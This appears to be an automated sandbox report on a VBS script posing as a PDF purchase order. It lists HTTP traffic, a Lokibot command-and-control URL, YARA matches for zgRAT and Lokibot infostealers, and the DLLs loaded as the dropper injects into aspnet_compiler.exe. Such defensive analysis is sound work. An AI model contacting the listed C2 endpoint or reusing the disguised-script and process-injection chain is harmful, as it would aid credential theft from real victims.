Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=js%2B3kSubVzQoLrNf9jMl6m9d5%2Bl9qUpPK9HAauQK%2FCp5wi%2FnFU7Zx4DWyDaNLXBsLevZOP6cClqiIp7HSfHVfrqRKGBmYA%2Fy3raJhMSQzz63MyBYNLpVlrgYy%2Fy4%2Fq4zww%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013c10ee102ed-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BoQ8mn4yQZ8xuvVJPVHXrgjiI1Kc5z1yQX4TsUmShe4umxdCggYnVCjNAOUj3CfC4XZdUFyW4CdQf3HGHF8iQUGsec3pfNnoT9HUl0qO7tEqiaG%2FmOHFY5KfAP6lxOwSuQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013c60f5e31da-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RepKrIlom55Ury5ShmjaPgwc58l61fbVjowvj48GpQ0JyfEJweHEqfmZHpLJNqg4hHfJBRupuGSi%2B1r719dD%2BM760fasd1M3Qa7axmSkv97RLz0JKSUP3m1qI%2BXliKFOZg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013d4bb227477-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kiVr%2Bmu6p3qg8iYD06JAPTm6K81vYRbCMTOf8NZ8CDWzUuYmxAChkrNBs8jn3qgiLqmVPGXg1B93YtQTZe%2BBMaplO4Ilhn555zJWpLHaU1aJJ%2BwzeR%2F4G9dKD7nIeEFbGA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013d99e615c5f-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fu9%2Fz0txcHfLZrS8TZNpgqQFUX%2BD%2BTaFhYWoraQEtTvcH7zfHONy1R83EEyR0Ifle%2FkhIYqo1OpefJDlReRvjGupOq3E0jJrF0k9QMKb7x%2BACvO1pea45423D9R2HgrdLA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013de7c9bb3d4-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NDJQoLlFI139OnCbYIj8B3JbJHEiByhI%2BhT%2B01r8gyMYFehzfbUR6BLVS5q8TPVBlKdnJsO1F8FPTd0abZcgSDUB413SJIzO7%2BzhBB2wo5XrTtTj79%2F372sJbux5NC%2F1BA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013e33808741e-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5N9ZuxSo5ETztlAp8mlCNp4Ybpa%2Fuhc3lAHjXc7KKIuvL8%2FqmZqkf8qfQ5%2Fz84CJJetmhTOs%2FYhHZh9nHAeamVn%2BwkDAd1sV2VZNUEiASH5TqNAAyTskIhfk4VoT9dwTFw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013e81cfa6dad-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rH5IKNnUHnByPE%2BNARCr3wPIOBqalodlIOchukprOydgmgF5oKtQm191Q4T3LgBd679fyk8QDe811q2WlR%2BVPMqrF%2Fro4AwXE3A1hgYra%2FrexvUSL4%2Bhpmgi25HZva14yQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013ecdd9c8da3-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jnEq6ZldLDpSAR6XYw60JSAuccC7iwsTKhGa9cZtjOgdBlQ5zlFQ5MNU3LPqruMzwPFvJWAJxI%2FYMGbDq44LQfoyfQmv%2FVlL54QdKbQesUsCT3Opou56p6PmeDOU7mIIIg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013f19d3431e6-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O1c8ZWHOxB06v96hAqsl%2BSmXf%2FKJMlT%2FBxGKTj4bjA2GVREmkTQzidLNHKt68i%2B4OKPFW4MWG1IkYjxz2dmP2MvTpZNnM55VAPcIzbUDVSl63GNZnARqMHR2OyDbwhi4Pw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013f658ca8dc6-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ptkxQNQOtr9ciCgNB83eUiTr5xOm3WdMsRhTrFHpCSHS6OXhp1WjiOiB2SzVW17wDG1K4rgg2qRwn9cRYgdxNYS2%2Bi4o%2ByMMblrnc7lD5DStOcTF%2F%2FgJKGCfD22z8bC13w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870013fb2e918dae-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:31:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7fbFCgsAg4dSvBXbBxyxy2Qcq2C2v8J0yMPFh5jm5XfyD0NJqef9ZyFKJYA6XUeOnd4iwwuKUn6v6DtUfGfxjik2sRpqErL8ZKc23IpSIMl8lYDwVzSCaalt8N0zmVDCMg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870014008a646dce-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: aspnet_compiler.exe, aspnet_compiler.exe, 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: aspnet_compiler.exe, 00000004.00000002.3493958315.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.3494407989.0000000000B48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altaskifer.sbs/PWS/fre.php

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.0.x.exe.70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.wscript.exe.1a474030090.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: x.exe PID: 7020, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 4596, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 2_2_00700CA0	2_2_00700CA0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 2_2_00700C90	2_2_00700C90
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 2_2_00700F40	2_2_00700F40
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 2_2_04952940	2_2_04952940
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 2_2_04952BE1	2_2_04952BE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0040549C	4_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_004029D4	4_2_004029D4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00405B6F appears 42 times

Source: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mscorjit.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: 2.0.x.exe.70000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.wscript.exe.1a474030090.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
